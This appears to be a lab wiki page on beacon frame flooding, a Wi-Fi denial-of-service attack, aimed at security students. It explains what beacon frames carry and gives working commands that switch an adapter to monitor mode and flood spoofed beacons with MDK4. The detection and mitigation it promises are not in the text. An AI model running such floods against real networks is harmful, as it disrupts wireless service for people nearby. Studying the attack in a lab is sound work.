Beacon Frame Flooding

From Embedded Lab Vienna for IoT & Security
Jump to navigation Jump to search

Summary

This documentation provides an overview of Beacon Frame Flooding attacks, a form of Denial-of-Service (DoS) targeting wireless networks by overloading them with spoofed beacon frames. It discusses how these attacks are implemented, their impact, and detection and mitigation techniques.

Requirements

  • Operating system: Linux-based distributions with support for monitor mode (e.g., Ubuntu 20.04).
  • Software tools: MDK4, Aircrack-ng

In order to complete these steps, you must have followed Hak5 Signal Owl: before.

Description

Step 1

Understanding Beacon Frames

Beacon frames are management packets broadcast by wireless access points (APs) to announce their presence. These frames include:

   SSID (network name).
   BSSID (AP MAC address).
   Channel and frequency details.
   Security protocol indicators (e.g., WPA2, WPA3).

Step 2

  • Enable monitor mode on the wireless network adapter:
   airmon-ng start wlan0
  • Execute MDK4 to generate spoofed beacon frames:
   mdk4 wlan0mon b -a -m -s 500
  • Observe the impact on the surrounding wireless environment.

Used Hardware

Hak5 Signal Owl: Device for automated pentesting tasks.

References